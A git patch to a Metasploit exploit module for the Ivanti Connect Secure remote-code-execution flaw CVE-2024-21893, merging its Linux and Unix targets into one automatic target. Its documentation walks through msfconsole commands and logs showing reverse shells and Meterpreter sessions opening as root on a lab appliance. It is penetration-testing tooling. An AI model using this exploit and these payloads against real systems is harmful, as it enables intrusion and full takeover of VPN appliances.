From 1f292c8a73056f7a11bb5d517e42c19b4c0590c9 Mon Sep 17 00:00:00 2001
From: sfewer-r7 <stephen_fewer@rapid7.com>
Date: Fri, 9 Feb 2024 09:26:08 +0000
Subject: [PATCH] remove the linux and unix targets in favor of a single
 automatic target

---
 ...vanti_connect_secure_rce_cve_2024_21893.md | 87 +++++++++++--------
 ...vanti_connect_secure_rce_cve_2024_21893.rb | 30 ++-----
 2 files changed, 59 insertions(+), 58 deletions(-)

diff --git a/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md b/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
index a1dc84db62..6eee777eb2 100644
--- a/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
+++ b/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
@@ -20,22 +20,19 @@ below steps are for HyperV, but it should be very similar to install on VMWare.
 1. Start msfconsole
 2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893`
 3. `set RHOST <TARGET_IP_ADDRESS>`
-4. `set target 0`
-5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
-6. `check`
-7. `exploit`
+4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
+5. `check`
+6. `exploit`
 
 ## Scenarios
-To support a broad set of available payloads, we support both a Linux target and a Unix Target. This allows for native
+To support a broad set of available payloads, we support both the Linux and Unix platforms. This allows for native
 Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
 
-### Linux Target
+### Automatic (Linux Payload)
 
 ```
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set RHOST 192.168.86.111
 RHOST => 192.168.86.111
-msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 0
-target => 0
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
 PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
@@ -44,33 +41,48 @@ Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
 
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   Proxies                   no        A proxy chain of format type:host:port[
+                                       ,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.me
+                                       tasploit.com/docs/using-metasploit/basi
+                                       cs/using-metasploit.html
    RPORT    443              yes       The target port (TCP)
-   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSL      true             no        Negotiate SSL/TLS for outgoing connecti
+                                       ons
    VHOST                     no        HTTP server virtual host
 
 
 Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
 
-   Name                Current Setting  Required  Description
-   ----                ---------------  --------  -----------
-   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      BiLTwvbxndD      no        Name to use on remote system when storing payload; cannot contain spaces.
-   FETCH_SRVHOST                        no        Local IP to use for serving payload
-   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
-   FETCH_URIPATH                        no        Local URI to use for serving payload
-   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
-   LHOST               eth0             yes       The listen address (an interface may be specified)
-   LPORT               4444             yes       The listen port
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   FETCH_COMMAND      CURL             yes       Command to fetch payload (Acc
+                                                 epted: CURL, FTP, TFTP, TNFTP
+                                                 , WGET)
+   FETCH_DELETE       false            yes       Attempt to delete the binary
+                                                 after execution
+   FETCH_FILENAME     XMZdmHhNxYx      no        Name to use on remote system
+                                                 when storing payload; cannot
+                                                 contain spaces.
+   FETCH_SRVHOST                       no        Local IP to use for serving p
+                                                 ayload
+   FETCH_SRVPORT      8080             yes       Local port to use for serving
+                                                  payload
+   FETCH_URIPATH                       no        Local URI to use for serving
+                                                 payload
+   FETCH_WRITABLE_DI  /tmp             yes       Remote writable dir to store
+   R                                             payload; cannot contain space
+                                                 s.
+   LHOST              eth0             yes       The listen address (an interf
+                                                 ace may be specified)
+   LPORT              4444             yes       The listen port
 
 
 Exploit target:
 
    Id  Name
    --  ----
-   0   Linux Command
+   0   Automatic
 
 
 
@@ -84,7 +96,7 @@ msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated.
 [*] Sending stage (3045380 bytes) to 192.168.86.111
-[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.111:49328) at 2024-02-06 11:38:33 +0000
+[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.111:45734) at 2024-02-09 09:21:59 +0000
 
 meterpreter > getuid
 Server username: root
@@ -104,17 +116,15 @@ export DSREL_DEPS=ive
 export DSREL_BUILDNUM=1647
 export DSREL_COMMENT="R1"
 meterpreter > exit
-[*] Shutting down session: 4
+[*] Shutting down session: 3
 
-[*] 192.168.86.111 - Meterpreter session 4 closed.  Reason: User exit
+[*] 192.168.86.111 - Meterpreter session 3 closed.  Reason: Died
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > 
 ```
 
-### Unix Target
+### Automatic (Unix Payload)
 
 ```
-msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 1
-target => 1
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/unix/reverse_bash
 PAYLOAD => cmd/unix/reverse_bash
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
@@ -123,10 +133,14 @@ Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
 
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   Proxies                   no        A proxy chain of format type:host:port[
+                                       ,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.me
+                                       tasploit.com/docs/using-metasploit/basi
+                                       cs/using-metasploit.html
    RPORT    443              yes       The target port (TCP)
-   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSL      true             no        Negotiate SSL/TLS for outgoing connecti
+                                       ons
    VHOST                     no        HTTP server virtual host
 
 
@@ -134,7 +148,8 @@ Payload options (cmd/unix/reverse_bash):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  eth0             yes       The listen address (an interface may be specified)
+   LHOST  eth0             yes       The listen address (an interface may be s
+                                     pecified)
    LPORT  4444             yes       The listen port
 
 
@@ -142,7 +157,7 @@ Exploit target:
 
    Id  Name
    --  ----
-   1   Unix Command
+   0   Automatic
 
 
 
@@ -155,7 +170,7 @@ msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
 [*] Started reverse TCP handler on 192.168.86.42:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated.
-[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.111:49330) at 2024-02-06 11:39:45 +0000
+[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.111:45736) at 2024-02-09 09:23:15 +0000
 
 id
 uid=0(root) gid=0(root) groups=0(root)
@@ -169,6 +184,6 @@ export DSREL_DEPS=ive
 export DSREL_BUILDNUM=1647
 export DSREL_COMMENT="R1"
 exit
-[*] 192.168.86.111 - Command shell session 5 closed.
+[*] 192.168.86.111 - Command shell session 4 closed.
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > 
 ```
diff --git a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
index 96fd14c74d..a32b2496a3 100644
--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
@@ -39,28 +39,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_CMD],
         'Privileged' => true, # Code execution as root.
         'Targets' => [
-          [
-            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
-            # cmd/linux/http/x64/meterpreter/reverse_tcp
-            # cmd/linux/http/x64/shell/reverse_tcp
-            # cmd/linux/http/x86/shell/reverse_tcp
-            'Linux Command',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_CMD]
-            },
-          ],
-          [
-            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
-            # cmd/unix/python/meterpreter/reverse_tcp
-            # cmd/unix/reverse_bash
-            # cmd/unix/reverse_python
-            'Unix Command',
-            {
-              'Platform' => 'unix',
-              'Arch' => [ARCH_CMD]
-            },
-          ]
+          # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+          # cmd/linux/http/x64/meterpreter/reverse_tcp
+          # cmd/linux/http/x64/shell/reverse_tcp
+          # cmd/linux/http/x86/shell/reverse_tcp
+          # cmd/unix/python/meterpreter/reverse_tcp
+          # cmd/unix/reverse_bash
+          # cmd/unix/reverse_python
+          ['Automatic', {}]
         ],
         'DefaultOptions' => {
           'RPORT' => 443,